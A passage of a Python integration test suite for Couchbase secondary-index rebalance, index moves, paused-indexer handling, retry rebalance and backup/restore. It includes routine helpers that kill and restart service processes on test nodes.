to_add_nodes, to_remove_nodes, swap_rebalance=True)
self.run_operation(phase="after")
def test_gsi_rebalance_out_last_indexer_node_and_add_one_indexer_node(self):
self.run_operation(phase="before")
self.sleep(30)
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], nodes_out_list)
# Queries running while this rebalance operation is going on will fail as the only indexer node is going out.
#self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
to_add_nodes = self.servers[self.nodes_init:self.nodes_init + 2]
services_in = ["index", "index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.run_operation(phase="before")
def test_gsi_rebalance_in_indexer_node_with_node_eject_only_as_false(self):
self.run_operation(phase="before")
self.sleep(30)
indexer_nodes = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
for indexer_node in indexer_nodes:
rest = RestConnection(indexer_node)
rest.set_index_settings({"indexer.rebalance.node_eject_only": False})
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
# rebalance in a node
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results, indexes should be redistributed even in case of rebalance in
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [], swap_rebalance=True)
self.run_operation(phase="after")
def test_gsi_rebalance_with_disable_index_move_as_true(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexer_nodes = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
for indexer_node in indexer_nodes:
rest = RestConnection(indexer_node)
rest.set_index_settings({"indexer.rebalance.disable_index_move": True})
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
to_remove_nodes = [nodes_out_list]
services_in = ["index"]
log.info(self.servers[:self.nodes_init])
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
# Dont run queries after removing a node because due to the above indexer rebalance, some indexes required by
# the queries could be dropped resulting into failed queries and failure in test
#self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], to_remove_nodes)
#self.run_async_index_operations(operation_type="query")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results, Indexes should not be redistributed as disable_index_move was set as True
try:
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, to_remove_nodes, swap_rebalance=True)
except Exception as ex:
if "some indexes are missing after rebalance" not in str(ex):
self.fail("gsi rebalance failed with unexpected error: {0}".format(str(ex)))
else:
self.fail("gsi rebalance distributed indexes even after disable_index_move is set as true")
#self.run_operation(phase="after")
def test_nest_and_intersect_queries_after_gsi_rebalance(self):
self.run_operation(phase="before")
intersect_query = "select name from {0} intersect select name from {0} s where s.age>20".format(self.buckets[0],
self.buckets[0])
nest_query = "select * from {0} b1 nest `default` b2 on keys b1._id where b1._id like 'airline_record%' limit 5".format(
self.buckets[0])
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [nodes_out_list])
for i in range(0, 2):
try:
self.n1ql_helper.run_cbq_query(query=intersect_query, server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=nest_query, server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
raise Exception("query with nest and intersect failed")
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance, [],
[nodes_out_list])
# Run intesect/nest queries post index redistribution
for i in range(0, 10):
try:
self.n1ql_helper.run_cbq_query(query=intersect_query, server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=nest_query, server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
raise Exception("query with nest and intersect failed")
self.run_operation(phase="after")
def test_gsi_rebalance_out_indexer_node_when_other_indexer_is_in_paused_state(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.rest.set_service_memoryQuota(service='indexMemoryQuota', memoryQuota=256)
for i in range(2):
query_definition_generator = SQLDefinitionGenerator()
self.query_definitions = query_definition_generator.generate_airlines_data_query_definitions()
self.query_definitions = query_definition_generator.filter_by_group(self.groups, self.query_definitions)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# Do some kv mutations
tasks = self.async_run_doc_ops()
for task in tasks:
task.result()
# Ensure indexer reaches to paused state
self._push_indexer_off_the_cliff()
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [self.servers[self.nodes_init]])
RestHelper(self.rest).rebalance_reached()
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail when indexer is in paused state")
def test_alter_index_when_src_indexer_is_in_paused_state(
self):
kv_server = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
index_server = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[self.servers[
self.nodes_init]], [],
services=services_in)
rebalance.result()
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(
map_before_rebalance)
self.rest.set_service_memoryQuota(service='indexMemoryQuota',
memoryQuota=256)
# Ensure indexer reaches to paused state
self._push_indexer_off_the_cliff(index_server)
output, error = self._cbindex_move(index_server,
self.servers[self.nodes_init],
indexes, self.alter_index,
remote_host=kv_server)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(
self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
if error:
self.log.info("ERROR : %s" % error)
self.fail("Alter index resulted in error")
def test_alter_index_when_dest_indexer_is_in_paused_state(
self):
kv_server = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
index_server = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[self.servers[
self.nodes_init]], [],
services=services_in)
rebalance.result()
query = "CREATE PRIMARY INDEX p1 on default USING GSI with {{'nodes':\"{0}:{1}\"}}".format(
self.servers[self.nodes_init].ip,
self.servers[self.nodes_init].port)
self.n1ql_helper.run_cbq_query(query=query,
server=self.n1ql_node)
self.sleep(60)
index_map, stats_map = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(
index_map)
index_hostname_before = self.n1ql_helper.get_index_details_using_index_name(
"p1", index_map)
self.rest.set_service_memoryQuota(service='indexMemoryQuota',
memoryQuota=256)
# Ensure indexer reaches to paused state
self._push_indexer_off_the_cliff(index_server)
output, error = self._cbindex_move(self.servers[self.nodes_init],
index_server,
"p1",
self.alter_index,
remote_host=kv_server)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(
self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
if error:
self.log.info("ERROR : %s" % error)
self.fail("Alter index resulted in error")
else:
# Alter index query will succeed, but it should later error out since the dest node is in OOM.
# Validate that the index is not moved.
index_map, stats_map = self._return_maps()
index_hostname_after = self.n1ql_helper.get_index_details_using_index_name(
"p1", index_map)
self.assertEqual(index_hostname_before, index_hostname_after,
"Alter index moved the index to an indexer in paused state")
def test_alter_index_without_action(self):
kv_server = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
index_server = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[self.servers[
self.nodes_init]], [],
services=services_in)
rebalance.result()
query = "CREATE PRIMARY INDEX p1 on default USING GSI with {{'nodes':\"{0}:{1}\"}}".format(
self.servers[self.nodes_init].ip,
self.servers[self.nodes_init].port)
self.n1ql_helper.run_cbq_query(query=query,
server=self.n1ql_node)
alter_idx_query = "ALTER INDEX default.p1 with {{'action':'','nodes':\"{0}:{1}\"}}".format(
index_server.ip, index_server.port)
try:
result = self.n1ql_helper.run_cbq_query(query=alter_idx_query,
server=self.n1ql_node)
self.log.info(result)
except Exception as ex:
if not "Unsupported action value" in str(ex):
self.log.info(str(ex))
self.fail(
"Alter index did not fail with expected error message")
def test_alter_index_when_src_indexer_is_in_dgm(
self):
kv_server = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
index_server = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[self.servers[
self.nodes_init]], [],
services=services_in)
rebalance.result()
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(
map_before_rebalance)
self.rest.set_service_memoryQuota(service='indexMemoryQuota',
memoryQuota=256)
# Ensure indexer reaches to DGM
self.get_dgm_for_plasma(index_server)
output, error = self._cbindex_move(index_server,
self.servers[self.nodes_init],
indexes, self.alter_index,
remote_host=kv_server)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(
self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
if error:
self.log.info("ERROR : %s" % error)
self.fail("Alter index resulted in error")
def test_alter_index_when_dest_indexer_is_in_dgm(
self):
kv_server = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
index_server = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[self.servers[
self.nodes_init]], [],
services=services_in)
rebalance.result()
query = "CREATE PRIMARY INDEX p1 on default USING GSI with {{'nodes':\"{0}:{1}\"}}".format(
self.servers[self.nodes_init].ip,
self.servers[self.nodes_init].port)
self.n1ql_helper.run_cbq_query(query=query,
server=self.n1ql_node)
self.sleep(60)
index_map, stats_map = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(
index_map)
self.rest.set_service_memoryQuota(service='indexMemoryQuota',
memoryQuota=256)
# Ensure indexer reaches to DGM
self.get_dgm_for_plasma(index_server)
output, error = self._cbindex_move(self.servers[self.nodes_init],
index_server,
"p1",
self.alter_index,
remote_host=kv_server)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(
self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
if error:
self.log.info("ERROR : %s" % error)
self.fail("Alter index resulted in error")
def test_explain_query_while_alter_index_is_running(self):
kv_server = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
index_server = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[self.servers[
self.nodes_init]], [],
services=services_in)
rebalance.result()
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(
map_before_rebalance)
output, error = self._cbindex_move(index_server,
self.servers[self.nodes_init],
indexes,
self.alter_index,
remote_host=kv_server)
explain_query = "EXPLAIN SELECT DISTINCT(age) from `default` where age > 18 LIMIT 10"
try:
result = self.n1ql_helper.run_cbq_query(query=explain_query,
server=self.n1ql_node)
self.log.info(result)
except Exception as ex:
self.log.info(str(ex))
self.fail("Alter index did not fail with expected error message")
def test_cbindex_move_from_any_node_apart_from_src_dest(self):
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
# run cbindex move from any host other than src or dest,not valid for alter index
self._cbindex_move(index_server, self.servers[self.nodes_init], indexes, self.alter_index, remote_host=kv_server)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
self.run_operation(phase="during")
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, [], swap_rebalance=True)
self.run_operation(phase="after")
def test_retry_rebalance(self):
body = {"enabled": "true", "afterTimePeriod": self.retry_time , "maxAttempts" : self.num_retries}
rest = RestConnection(self.master)
rest.set_retry_rebalance_settings(body)
result = rest.get_retry_rebalance_settings()
self.shell.execute_cbworkloadgen(rest.username, rest.password, 2000000, 100, "default", 1024, '-j')
if not self.build_index:
self.run_operation(phase="before")
self.sleep(30)
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
if self.rebalance_out:
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
try:
if self.build_index:
thread1 = threading.Thread(name='ddl', target=self.create_workload_index)
thread1.start()
self.sleep(5)
if self.rebalance_out:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
else:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[self.servers[self.nodes_init]], [],
services=services_in)
self.sleep(4)
# reboot an index node during gsi rebalance
if not self.build_index:
self.reboot_node(index_server)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
if "Rebalance failed" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail after index node reboot")
# Rerun rebalance to check if it can recover from failure
if self.build_index:
thread1.join()
self.check_retry_rebalance_succeeded()
if self.rebalance_out and not self.build_index:
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[], [index_server])
def create_workload_index(self):
workload_index = "CREATE INDEX idx12345 ON default(name)"
self.n1ql_helper.run_cbq_query(query=workload_index,
server=self.n1ql_node)
return
def _return_maps(self):
index_map = self.get_index_map()
stats_map = self.get_index_stats(perNode=False)
return index_map, stats_map
def _cbindex_move(self, src_node, dst_node, index_list, alter_index=False, queue=None,run_from_dst=False,username="Administrator", password="password",
expect_failure=False, bucket="default", remote_host=None):
ip_address = str(dst_node).replace("ip:", "").replace(" port",
"").replace(
" ssh_username:root", "").replace(" ssh_username:Administrator", "")
if alter_index:
alter_index_query = 'ALTER INDEX default.' + index_list + ' WITH {{"action":"move","nodes": ["{0}"]}}'.format(
ip_address)
try:
self.n1ql_helper.run_cbq_query(query=alter_index_query,
server=self.n1ql_node)
return "success", ""
except Exception as ex:
self.log.info(str(ex))
return "", str(ex)
else:
cmd = """cbindex -type move -index '{0}' -bucket {1} -with '{{"nodes":"{2}"}}' -auth '{3}:{4}'""".format(
index_list,
bucket,
ip_address,
username,
password)
log.info(cmd)
if run_from_dst:
connection_node = dst_node
else:
connection_node = src_node
if remote_host is not None:
connection_node = remote_host
remote_client = RemoteMachineShellConnection(connection_node)
command = "{0}/{1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
if error and not [x for x in output if 'Moving Index for' in x]:
if expect_failure:
log.info("cbindex move failed")
if queue is not None:
queue.put(output, error)
return output, error
else:
self.fail("cbindex move failed")
else:
log.info("cbindex move started successfully : {0}".format(output))
if queue is not None:
queue.put(output, error)
return output, error
def _get_indexes_in_move_index_format(self, index_map):
for bucket in index_map:
for index in index_map[bucket]:
return index, 1
def wait_for_cbindex_move_to_complete(self, dst_node, count):
no_of_indexes_moved = 0
exit_count = 0
while no_of_indexes_moved != count and exit_count != 10:
index_map = self.get_index_map()
host_names_after_rebalance = []
index_distribution_map_after_rebalance = {}
for bucket in index_map:
for index in index_map[bucket]:
host_names_after_rebalance.append(index_map[bucket][index]['hosts'])
for node in host_names_after_rebalance:
index_distribution_map_after_rebalance[node] = index_distribution_map_after_rebalance.get(node, 0) + 1
ip_address = str(dst_node).replace("ip:", "").replace(" port", "").replace(" ssh_username:root", "").replace(" ssh_username:Administrator", "")
log.info(ip_address)
log.info(index_distribution_map_after_rebalance)
if ip_address in index_distribution_map_after_rebalance:
no_of_indexes_moved = index_distribution_map_after_rebalance[ip_address]
else:
no_of_indexes_moved = 0
log.info("waiting for cbindex move to complete")
self.sleep(30)
exit_count += 1
if no_of_indexes_moved == count:
log.info("cbindex move completed")
else:
self.fail("timed out waiting for cbindex move to complete")
def run_operation(self, phase="before"):
if phase == "before":
self.run_async_index_operations(operation_type="create_index")
elif phase == "during":
self.run_async_index_operations(operation_type="query")
else:
self.run_async_index_operations(operation_type="query")
self.run_async_index_operations(operation_type="drop_index")
def _drop_index(self, query_definition, bucket):
query = query_definition.generate_index_drop_query(
bucket=bucket,
use_gsi_for_secondary=self.use_gsi_for_secondary,
use_gsi_for_primary=self.use_gsi_for_primary)
log.info(query)
actual_result = self.n1ql_helper.run_cbq_query(query=query,
server=self.n1ql_server)
def _create_index_with_defer_build(self, defer_build=True):
for bucket in self.buckets:
for query_definition in self.query_definitions:
query = query_definition.generate_index_create_query(
bucket=bucket, use_gsi_for_secondary=self.use_gsi_for_secondary,
deploy_node_info=None, defer_build=defer_build)
log.info(query)
create_index_task = self.cluster.async_create_index(
server=self.n1ql_server, bucket=bucket, query=query,
n1ql_helper=self.n1ql_helper,
index_name=query_definition.index_name,
defer_build=defer_build)
create_index_task.result()
def _build_index(self, sleep=30):
exceptions = []
try:
for bucket in self.buckets:
for query_definition in self.query_definitions:
query = self.n1ql_helper.gen_build_index_query(
bucket=bucket, index_list=[query_definition.index_name])
build_index_task = self.cluster.async_build_index(
server=self.n1ql_server, bucket=bucket, query=query,
n1ql_helper=self.n1ql_helper)
build_index_task.result()
self.sleep(sleep)
except Exception as ex:
exceptions.append(str(ex))
finally:
return exceptions
def _set_indexer_compaction(self):
DAYS = ["Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"]
date = datetime.now()
dayOfWeek = (date.weekday() + (date.hour + ((date.minute + 5) // 60)) // 24) % 7
status, content, header = self.rest.set_indexer_compaction(indexDayOfWeek=DAYS[dayOfWeek],
indexFromHour=date.hour + ((date.minute + 2) // 60),
indexFromMinute=(date.minute + 2) % 60,
indexToHour=date.hour + ((date.minute + 3) // 60),
indexToMinute=(date.minute + 3) % 60,
abortOutside=True)
self.assertTrue(status, "Error in setting Circular Compaction... {0}".format(content))
def _set_bucket_compaction(self):
compact_tasks = []
for bucket in self.buckets:
compact_tasks.append(self.cluster.async_compact_bucket(self.master, bucket))
for task in compact_tasks:
task.result()
def _push_indexer_off_the_cliff(self, index_server=None):
cnt = 0
docs = 3000
while cnt < 20:
if self._validate_indexer_status_oom(index_server):
log.info("OOM on index server is achieved")
return True
for task in self.kv_mutations(docs):
task.result()
self.sleep(30)
cnt += 1
docs += 3000
return False
def _validate_indexer_status_oom(self, index_server=None):
if not index_server:
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rest = RestConnection(index_server)
index_stats = rest.get_indexer_stats()
if index_stats["indexer_state"].lower() == "paused":
return True
else:
return False
def kv_mutations(self, docs=1):
if not docs:
docs = self.docs_per_day
gens_load = self.generate_docs(docs)
self.full_docs_list = self.generate_full_docs_list(gens_load)
self.gen_results = TuqGenerators(self.log, self.full_docs_list)
tasks = self.async_load(generators_load=gens_load, op_type="create",
batch_size=self.batch_size)
return tasks
def kill_erlang(self, server):
"""Kill erlang process running on server.
"""
NodeHelper._log.info("Killing erlang on server: {0}".format(server))
shell = RemoteMachineShellConnection(server)
os_info = shell.extract_remote_info()
shell.kill_erlang(os_info)
shell.start_couchbase()
shell.disconnect()
def kill_memcached1(self, server):
remote_client = RemoteMachineShellConnection(server)
remote_client.kill_memcached()
remote_client.disconnect()
def _create_backup(self, server, username="Administrator", password="password"):
remote_client = RemoteMachineShellConnection(server)
command = self.cli_command_location + "cbbackupmgr config --archive /data/backups --repo example{0}".format(
self.rand)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
if error and not [x for x in output if 'created successfully in archive' in x]:
self.fail("cbbackupmgr config failed")
cmd = "cbbackupmgr backup --archive /data/backups --repo example{0} --cluster couchbase://127.0.0.1 --username {1} --password {2}".format(
self.rand, username, password)
command = "{0}{1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
if error and not [x for x in output if 'Backup successfully completed' in x]:
self.fail("cbbackupmgr backup failed")
def _create_restore(self, server, username="Administrator", password="password"):
remote_client = RemoteMachineShellConnection(server)
cmd = "cbbackupmgr restore --archive /data/backups --repo example{0} --cluster couchbase://127.0.0.1 --username {1} --password {2} --force-updates".format(
self.rand, username, password)
command = "{0}{1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
if error and not [x for x in output if 'Restore completed successfully' in x]:
self.fail("cbbackupmgr restore failed")
def _run_prepare_statement(self):
query = "SELECT * FROM system:indexes"
result_no_prepare = self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server)['results']
query = "PREPARE %s" % query
prepared = self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server)['results'][0]
result_with_prepare = self.n1ql_helper.run_cbq_query(query=prepared, is_prepared=True, server=self.n1ql_server)[
'results']
msg = "Query result with prepare and without doesn't match.\nNo prepare: %s ... %s\nWith prepare: %s ... %s"
self.assertTrue(sorted(result_no_prepare) == sorted(result_with_prepare),
msg % (result_no_prepare[:100], result_no_prepare[-100:],
result_with_prepare[:100], result_with_prepare[-100:]))
def _kill_all_processes_cbq(self, server):
shell = RemoteMachineShellConnection(server)
o = shell.execute_command("ps -aef| grep cbq-engine")
if len(o):
for cbq_engine in o[0]:
if cbq_engine.find('grep') == -1:
pid = [item for item in cbq_engine.split(' ') if item][1]
shell.execute_command("kill -9 %s" % pid)
def _kill_all_processes_index(self, server):
shell = RemoteMachineShellConnection(server)
shell.execute_command("killall indexer")
def _kill_fts_process(self, server):
shell = RemoteMachineShellConnection(server)
shell.kill_cbft_process()
shell.disconnect()
def _create_replica_index(self, query):
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_node)
##############################################################################################
#
# N1QL Tests
##############################################################################################
def ansi_join_query(self, stage="", expected=""):
query = "select * from (select default.country from default d unnest d.travel_details as default limit 1000) d1 " \
"inner join `travel-sample` t on (d1.country == t.country)"
if stage == "pre_rebalance":
self.n1ql_helper.run_cbq_query(query="CREATE INDEX idx ON `travel-sample`(country)", server=self.n1ql_node)
expected_results = self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_node)
return expected_results
elif stage =="post_rebalance":
actual_results = self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_node)
self.assertEqual(expected['metrics']['resultCount'], actual_results['metrics']['resultCount'])
else:
self.n1ql_helper.run_cbq_query(query="DROP INDEX `travel-sample`.idx", server=self.n1ql_node)
def test_kv_and_gsi_rebalance_with_high_ops(self):
self.rate_limit = self.input.param("rate_limit", 100000)
self.batch_size = self.input.param("batch_size", 1000)
self.doc_size = self.input.param("doc_size", 100)
self.instances = self.input.param("instances", 1)
self.threads = self.input.param("threads", 1)
self.use_replica_to = self.input.param("use_replica_to", False)
self.kv_node_out = self.input.param("kv_node_out")
self.index_node_out = self.input.param("index_node_out")
self.num_docs = self.input.param("num_docs", 30000)
# self.run_operation(phase="before")
create_index_queries = ["CREATE INDEX idx_body ON default(body) USING GSI",
"CREATE INDEX idx_update ON default(`update`) USING GSI",
"CREATE INDEX idx_val ON default(val) USING GSI",
"CREATE INDEX idx_body1 ON default(body) USING GSI",
"CREATE INDEX idx_update1 ON default(`update`) USING GSI",
"CREATE INDEX idx_val1 ON default(val) USING GSI"]
for create_index_query in create_index_queries:
self._create_replica_index(create_index_query)
load_thread = threading.Thread(target=self.load_buckets_with_high_ops,
name="gen_high_ops_load",
args=(self.master, self.buckets[0], self.num_docs,
self.batch_size,
self.threads, 0,
self.instances, 0))
load_thread.start()
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["kv"]
# do a swap rebalance of kv
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]],
[self.servers[self.kv_node_out]], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
load_thread.join()
errors = self.check_dataloss_for_high_ops_loader(self.master, self.buckets[0],
self.num_docs,
self.batch_size,
self.threads,
0,
False, 0, 0,
False, 0)
if errors:
self.log.info("Printing missing keys:")
for error in errors:
print(error)
if self.num_docs + self.docs_per_day != self.rest.get_active_key_count(self.buckets[0]):
self.fail("FATAL: Data loss detected!! Docs loaded : {0}, docs present: {1}".
format(self.num_docs + self.docs_per_day, self.rest.get_active_key_count(self.buckets[0])))
load_thread1 = threading.Thread(target=self.load_buckets_with_high_ops,
name="gen_high_ops_load",
args=(self.master, self.buckets[0], self.num_docs * 2,
self.batch_size,
self.threads, 0,
self.instances, 0))
load_thread1.start()
# do a swap rebalance of index
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [self.servers[self.nodes_init+1]]
, [self.servers[self.index_node_out]], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
load_thread1.join()
errors = self.check_dataloss_for_high_ops_loader(self.master, self.buckets[0],
self.num_docs * 2,
self.batch_size,
self.threads,
0,
False, 0, 0,
False, 0)
if errors:
self.log.info("Printing missing keys:")
for error in errors:
print(error)
if self.num_docs * 2 + self.docs_per_day != self.rest.get_active_key_count(self.buckets[0]):
self.fail("FATAL: Data loss detected!! Docs loaded : {0}, docs present: {1}".
format(self.num_docs * 2 + self.docs_per_day, self.rest.get_active_key_count(self.buckets[0])))
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init + 1]],
[self.servers[self.index_node_out]], swap_rebalance=True)
def load_buckets_with_high_ops(self, server, bucket, items, batch=20000,
threads=5, start_document=0, instances=1, ttl=0):
import subprocess
cmd_format = "python3 scripts/high_ops_doc_gen.py --node {0} --bucket {1} --user {2} --password {3} " \
"--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --instances {9} --ttl {10}"
cb_version = RestConnection(server).get_nodes_version()[:3]
if self.num_replicas > 0 and self.use_replica_to:
cmd_format = "{} --replicate_to 1".format(cmd_format)
cmd = cmd_format.format(server.ip, bucket.name, server.rest_username,
server.rest_password,
items, batch, threads, start_document,
cb_version, instances, ttl)
self.log.info("Running {}".format(cmd))
result = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output = result.stdout.read()
error = result.stderr.read()
if error:
self.log.error(error)
self.fail("Failed to run the loadgen.")
if output:
loaded = output.split('\n')[:-1]
total_loaded = 0
for load in loaded:
